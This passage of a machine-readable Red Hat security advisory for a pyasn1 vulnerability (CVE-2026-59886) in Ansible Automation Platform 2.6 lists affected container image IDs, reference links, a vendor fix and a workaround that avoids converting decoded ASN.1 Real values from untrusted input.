"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-59886"
},
{
"category": "external",
"summary": "RHBZ#2500041",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2500041"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-59886",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-59886"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-59886",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59886"
},
{
"category": "external",
"summary": "https://github.com/pyasn1/pyasn1/commit/e60c691cb91addb8fcefa2f537e85ede6fb1e886",
"url": "https://github.com/pyasn1/pyasn1/commit/e60c691cb91addb8fcefa2f537e85ede6fb1e886"
},
{
"category": "external",
"summary": "https://github.com/pyasn1/pyasn1/releases/tag/v0.6.4",
"url": "https://github.com/pyasn1/pyasn1/releases/tag/v0.6.4"
},
{
"category": "external",
"summary": "https://github.com/pyasn1/pyasn1/security/advisories/GHSA-hm4w-wwcw-mr6r",
"url": "https://github.com/pyasn1/pyasn1/security/advisories/GHSA-hm4w-wwcw-mr6r"
}
],
"release_date": "2026-07-14T16:38:29.691000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T21:39:16+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50479"
},
{
"category": "workaround",
"details": "When processing untrusted ASN.1 data with pyasn1, avoid calling prettyPrint(), str(), float(), int(), or performing comparisons or arithmetic on decoded Real (ASN.1 REAL type) objects. Instead, inspect the raw (mantissa, base, exponent) tuple directly. Where logging decoded ASN.1 structures is necessary, filter out or sanitize Real-typed values before conversion.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
